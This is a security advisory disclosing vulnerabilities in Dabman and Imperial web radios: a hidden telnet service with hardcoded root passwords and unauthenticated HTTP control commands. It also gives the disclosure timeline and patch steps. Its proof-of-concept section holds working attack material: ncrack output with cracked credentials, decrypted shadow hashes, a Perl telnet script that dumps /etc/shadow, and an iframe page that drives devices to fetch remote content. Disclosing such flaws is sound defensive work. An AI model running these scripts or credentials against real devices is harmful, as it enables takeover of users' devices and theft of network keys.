Share
Document Title:
===============
Dabman & Imperial (i&d) - Multiple Vulnerabilities


References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2183

Video: https://www.vulnerability-lab.com/get_content.php?id=2190

Vulnerability Magazine: https://www.vulnerability-db.com/?q=articles/2019/09/09/imperial-dabman-internet-radio-undocumented-telnetd-code-execution

http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13473
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-13474

CVE-ID:
=======
CVE-2019-13473


Release Date:
=============
2019-09-09


Vulnerability Laboratory ID (VL-ID):
====================================
2183


Common Vulnerability Scoring System:
====================================
9.4


Vulnerability Class:
====================
Multiple


Current Estimated Price:
========================
5.000€ - 10.000€


Product & Service Introduction:
===============================
Since 1993, TELESTAR has been synonymous with quality and a very good price/performance ratio in the consumer electronics segment. 
TELESTAR-DIGITAL GmbH distributes high-quality reception technology for digital TV reception via satellite (DVB-S), cable (DVBC) 
or terrestrial (DVB-T) from its headquarters in the Vulkaneifel region of Germany. The product portfolio includes digital receivers 
and the latest generation of television sets as well as modern distribution and single-cable technology, satellite to IP reception 
solutions and radio transmission systems. The product range is rounded off by Germany's most comprehensive range of accessories 
for digital television reception.

(Copy of the Homepage: https://www.xing.com/companies/telestar-digitalgmbh )


Abstract Advisory Information:
==============================
The vulnerability laboratory research team discovered multiple vulnerabilities in the dabman and imperial web radio devices series (typ d & i).


Vulnerability Disclosure Timeline:
==================================
2019-06-01: Researcher Notification & Coordination (Security Researcher)
2019-06-02: Vendor Notification (Telestar Digital Data Security Department)
2019-06-07: Vendor Response/Feedback (Telestar Digital Data Security Department)
2019-08-30: Vendor Fix/Patch (Service Developer Team)
2019-09-08: Public Disclosure (Vulnerability Laboratory)


Discovery Status:
=================
Published


Exploitation Technique:
=======================
Remote


Severity Level:
===============
Critical


Authentication Type:
====================
Pre auth - no privileges


User Interaction:
=================
No User Interaction


Disclosure Type:
================
Coordinated Disclosure


Technical Details & Description:
================================
1.1
The dabman and imperial manufactured web radio series (typ d & i) suffers from a weak password vulnerability.
The vulnerabilites allows local and remote attackers to compromise the web radios full embedded linux busybox os.

The vulnerability is located within an undocumented telnet service (telnetd) of the linux busybox and is 
turned permanently on. The telnetd service uses weak passwords with hardcoded credentials on the local embedded 
linux busybox of the internet radio devices. The telnet password can be cracked by usage of simple manual password 
bruteforce technics or by basic automated attacks with scripts (exp. ncrack). After receiving the password the 
remote or local network attacker can unauthorized login to the internet radio device to use the embedded linux 
busybox operating system.

After the attacker has been logged in as root user, he can open the /etc/ path to cat gshadow, shadow and the conf files. 
At the end the attacker has finally full root access on the busybox (telnetd), he can access the web-server (httpd) as 
admin and see the wireless lan + unencrypted key in ./flash/ - wifi.cfg. A demo exploit poc is available in the wild.

Due to some deeper researcher we identified also another manufacturer that uses the same typ of default manufactured system.
The same undocumented telnet service was uncovered during the analysis. The manufacturer is still processing a patch.

Vulnerable Protocol(s):
[+] telnetd

System(s):
[+] BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash) (Debian Linux PreRelease - ARM 3.3.2)

Firmware Version(s):
[+] TN81HH96-g102h-g102

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


1.2
The dabman and imperial manufactured web radio series (typ d & i) suffers from a command execution vulnerability.
The vulnerability allows local and remote attackers unauthorized and unauthenticated send commands to comprimise the web radio devices.

The vulnerability is located httpd web-server communcation on port 80 and 8080. Local and remote attackers can send basic GET 
commands with basic command line tools (exp. curl or modhttp) to modify or manipulate http requests. The attacker can also capture 
the http airmusic commands to reverse engineer the radio device for unauthorized interactions. The system has no protection mechanism 
to block unauthorized transmit of commands. The web radio as well not owns an auth or reminder mechanism to ensure only allowed or 
trusted sources can transmit the commands (client, system, mac , auth ...).

Vulnerable Protocol(s):
[+] httpd

Module(s):
[+] UIData (Web UI on 80 or 8080)

Function(s):
[+] /set_dname
[+] /mylogo
[+] /LocalPlay
[+] /LocalPlay
[+] /irdevice.xml
[+] /Sendkey
[+] /setvol
[+] /hotkeylist
[+] /init
[+] /playlogo.jpg
[+] /stop
[+] /exit
[+] /back
[+] /playinfo

Parameter(s):
[+] ?name=
[+] ?url=./*.jpg
[+] ?url=/stream.wav&name=*
[+] ?url=/msg.wav&save=*
[+] ?key=*
[+] ?vol=*0&mute=*
[+] ?language=*

Affected Function(s):
[+] Air Music Controls

Manufacturer:
Telestar Digital Gmbh

Affected Version(s):
[+] Bobs Rock Radio
[+] Dabman D10
[+] Dabman i30 Stereo
[+] Imperial i110
[+] Imperial i150
[+] Imperial i200
[+] Imperial i200-cd
[+] Imperial i400
[+] Imperial i450
[+] Imperial i500-bt
[+] Imperial i600


Proof of Concept (PoC):
=======================
1.1   Undocumented Telnet Service (telnetd)
The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.


Nmap Portscan
Scanning R-MAVERIC-EMAC_1_01_018 (93.234.141.215) [1000 ports]
Discovered open port 8080/tcp on 93.234.141.215
Discovered open port 80/tcp on 93.234.141.215
Discovered open port 23/tcp on 93.234.141.215
Completed SYN Stealth Scan at 14:48, 13.38s elapsed (1000 total ports)
Initiating Service scan at 14:48
Scanning 3 services on R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Completed Service scan at 14:48, 6.20s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
NSE: Script scanning 93.234.141.215.
Initiating NSE at 14:48
Completed NSE at 14:49, 30.61s elapsed
Initiating NSE at 14:49
Completed NSE at 14:49, 0.00s elapsed
Nmap scan report for R-MAVERIC-EMAC_1_01_018 (93.234.141.215)
Host is up (0.010s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE    VERSION
23/tcp   open  telnet     security DVR telnetd (many brands)
80/tcp   open  tcpwrapped
|_http-title: AirMusic
8080/tcp open  http       BusyBox httpd 1.13
| http-methods: 
|_  Supported Methods: GET
|_http-title: 404 Not Found
MAC Address: 7C:C7:09:FD:3B:56 (Shenzhen Rf-link Technology)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.16 - 2.6.35 (embedded)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=197 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel


NCrack [telnetd] (ncrack -v --user root [IP]:[PORT])
C:Program Files (x86)Ncrack>ncrack -v --user root 93.234.141.215:23
Starting Ncrack 0.6 ( http://ncrack.org ) at 2019-06-29 18:21 Mitteleuropõische Sommerzeit
Discovered credentials on telnet://93.234.141.215:23 'root' 'password'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password1'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password2'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password123'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password12'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password3'
Discovered credentials on telnet://93.234.141.215:23 'root' 'password!'
telnet://93.234.141.215:23 finished. Too many failed attemps.
Discovered credentials for telnet on 93.234.141.215 23/tcp:
93.234.141.215 23/tcp telnet: 'root' 'password'
93.234.141.215 23/tcp telnet: 'root' 'password1'
93.234.141.215 23/tcp telnet: 'root' 'password2'
93.234.141.215 23/tcp telnet: 'root' 'password123'
93.234.141.215 23/tcp telnet: 'root' 'password12'
93.234.141.215 23/tcp telnet: 'root' 'password3'
93.234.141.215 23/tcp telnet: 'root' 'password!'
Ncrack done: 1 service scanned in 273.29 seconds.
Probes sent: 1117 | timed-out: 50 | prematurely-closed: 117
Ncrack finished.


System:
BusyBox v1.15.2 (2014-05-05 23:37:21 CST) built-in shell (ash)

Kernel:
9)20151217_M8_TFT_7601_Kernel

OS: CC: (GNU) 3.3.2 20031005 (Debian prerelease)GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 4.2.1GCC: 
(GNU) 4.2.1GCC: (GNU) 4.2.1GCC: (GNU) 3.3.2 20031005 (Debian prerelease)Aaeabi.shstrtab.init.text.fini.
rodata.ARM.extab.ARM.exidx.eh_frame.init_array.
fini_array.jcr.data.rel.ro.got.data.bss.comment.ARM.attributes 


Built-in commands:
 . : [ [[ bg break cd chdir continue echo eval exec exit export
false fg hash help jobs kill local printf pwd read readonly return
set shift source test times trap true type ulimit umask unset wait

Currently defined functions:
        [, [[, ash, cat, chmod, cp, date, df, echo, free, ftpget, ftpput,
        gunzip, httpd, ifconfig, init, insmod, kill, killall, linuxrc, login,
        ls, lzmacat, mdev, mkdir, mount, mv, ping, ps, pwd, rm, rmmod, route,
        run-parts, sh, sleep, sync, tar, telnetd, test, top, true, udhcpc,
        udhcpd, umount, unlzma, usleep, zcat


Username: root
Password: password & password!

shadow
root:r.BF8RVw56BOA:1:0:99999:7:::	(decrypted: password & mldonkey)
ftp:!:0::::::				(decrypted: empty/blank)
usb:w.rW11jv2dmM2:13941::::::		(decrypted: winbond)

gshadow
root:::root,mldonkey


PoC: Exploit
use Net::Telnet ();
use Cwd;
$file="inputLog.txt";
$ofile="outputlog.txt";

# For local network change to localhost or local ip
@hosts = ("93.234.141.215");

foreach $hostip (sort @hosts)
{
    $t = new Net::Telnet (Timeout => 10,
                    Input_log => $file,
                    Prompt => "/>/");
    print "nnConnecting to undocumented Telnet Service of Imperial or Dabman Web Radio Service: $hostip ...n";
	print "nnAffected Models: Bobs Rock Radio, D10, i30, D30iS, i110, i150, i200, i200-cd, i400, i450, i500-bt, i600n";
    $t->open("$hostip");
    $t->login("root","password");
    my @lines = $t->cmd('cat /etc/shadow');
    print "$hostip: Directories:n";
    print "@lines n";
    $t->close;
}



1.2  AirMusic Unauthenticated Command Execution (httpd)
The security vulnerability can be exploited by local and remote attackers without user interaction or privileged user account.
For security demonstration or to reproduce follow the provided information and steps below to continue.

AirMusic Status Interface: http://93.234.141.215:80
Web-Server HTTPD UIData Path: http://93.234.141.215:8080

Note: Attacks can be performed in the local network (Localhost:80) or remotly by 
requesting the url remote ip adress (93.234.141.215) + forwarded remote port(Standard :23).

Get device name from Device
http://93.234.141.215:80/irdevice.xml

Set device name
http://93.234.141.215:80/set_dname?name=PWND

Set boot-logo (HTTP URL, requirement: JPG)
http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg

Display or retrieve channel logo
http://93.234.141.215:80:8080/playlogo.jpg

Changing the main menu with the selected language
http://93.234.141.215:80/init?language=us

Play stream
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME

Save audio file as message
http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1

Recall channel hotkeys
http://93.234.141.215:80/hotkeylist

Current playback data
http://93.234.141.215:80/playinfo

Set volume from 0-31 & mute function
http://93.234.141.215:80/setvol?vol=10&mute=0

Reset
http://93.234.141.215:80/back

Set stop
http://93.234.141.215:80/stop

Activate all back
http://93.234.141.215:80/exit

Send keystroke combo
http://93.234.141.215:80/Sendkey?key=3


PoC: Exploit
<html>
<head><body>
<title>Dabman & Imerpial - HTML AutoPwner</title>
<iframe src=http://93.234.141.215:80/set_dname?name=PWND></iframe>
<iframe src=http://93.234.141.215:80/mylogo?url=http://vulnerability-lab.com/pwnd.jpg></iframe>
<iframe src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/stream.wav&name=NAME></iframe>
<iframe src=http://93.234.141.215:80/LocalPlay?url=http://vulnerability-lab.com/msg.wav&save=1></iframe>
</body></head>
<html>


PoC: Checker for Modifications
#!/usr/bin/perl

use strict;
use warnings;
use LWP::Simple;

my $url1 = 'http://93.234.141.215:80/';
my $source1 = get( $url1 );

my $url2 = 'http://93.234.141.215:80/';
my $source2 = get( $url2 );

print $source1;
print $source1;


Solution - Fix & Patch:
=======================
A fresh updated version is available by the manufacturer telestar digital gmbh to resolve the vulnerabilities in 
all i & d series products. It is recommended to install the updates as quick as possible to ensure the digital security.

Manual steps to update:
1. Set the device to the factory setting
2. Select language
3. Switch off the device
4. Switch on the device
5. Network setup
6. Wait for "New Software" message
7. Press OK to start the update 
8. Updated Version: TN81HH96-g102h-g103**a*-fb21a-3624


Security Risk:
==============
The security risk of the vulnerabilities in the online web radio with wifi and user interface are estimated as critical.
The vulnerability can be exploited by local attackers in a network or by remote attackers without user interaction or 
further privileged user accounts. The potential of the issue being exploited in thousends of end user devices all over europe 
is estimated as high. The issue has the potential that could be used by remote attackers for spreading randomware / malware, 
mass defacements, compromises for further linux network attacks or being part of a criminal acting iot botnet.


Credits & Authors:
==================
Benjamin K.M. [VULNERABILITY LAB - CORE RESEARCH TEAM] - https://www.vulnerability-lab.com/show.php?user=Benjamin+K.M.


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, 
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab 
or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits 
or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do 
not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. 
We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.

Domains:    www.vulnerability-lab.com		www.vuln-lab.com				www.vulnerability-db.com
Services:   magazine.vulnerability-lab.com	paste.vulnerability-db.com 			infosec.vulnerability-db.com
Social:	    twitter.com/vuln_lab		facebook.com/VulnerabilityLab 			youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php 	vulnerability-lab.com/rss/rss_upcoming.php 	vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php 	vulnerability-lab.com/register.php  vulnerability-lab.com/list-of-bug-bounty-programs.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. 
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other 
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other 
information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or 
edit our material contact (admin@ or research@) to get a ask permission.

				    Copyright © 2019 | Vulnerability Laboratory - [Evolution Security GmbH]™